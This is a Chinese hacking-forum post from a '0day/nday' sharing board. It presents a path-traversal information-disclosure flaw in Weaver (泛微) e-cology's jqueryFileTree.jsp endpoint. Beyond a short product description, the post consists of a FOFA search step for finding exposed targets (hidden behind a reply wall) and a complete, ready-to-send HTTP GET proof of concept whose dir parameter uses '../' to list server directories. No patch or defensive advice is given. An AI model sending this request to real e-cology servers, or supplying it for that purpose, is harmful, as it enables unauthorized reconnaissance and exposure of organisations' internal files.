设为首页收藏本站
切换到宽版

吾要学习网

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
吾要学习网»论坛 渗透测试 0day/nday分享区 泛微e-cology jqueryFileTree.jsp接口存在敏感信息泄露 ...
返回列表 发新帖
查看: 146|回复: 0

泛微e-cology jqueryFileTree.jsp接口存在敏感信息泄露

[复制链接]
admin
  • TA的每日心情
    无聊
    昨天 09:04

    • 签到天数: 17 天

    [LV.4]偶尔看看III

    347

    主题

    348

    帖子

    2157

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    2157
    发表于 2025-9-9 15:41:23 | 显示全部楼层 |阅读模式
    泛微e-cology依托全新的设计理念,全新的管理思想。 为中大型组织创建全新的高效协同办公环境。 智能语音办公,简化软件操作界面。 身份认证、电子签名、电子签章、数据存证让合同全程数字化。泛微e-cology jqueryFileTree.jsp接口存在敏感信息泄露。



    资产确定 FOFA :
    游客,如果您要查看本帖隐藏内容请回复


    POC


    GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1
    Host: xx.xx.xx.xx
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Connection: Keep-Alive
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Upgrade-Insecure-Requests: 1



    回复

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|小黑屋|吾要学习网 ( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号

    GMT+8, 2025-10-11 03:30 , Processed in 0.094370 second(s), 34 queries .

    Powered by 吾要学习

    Copyright © 2001-2025, wuyaoxuexi.cn.

    快速回复 返回顶部 返回列表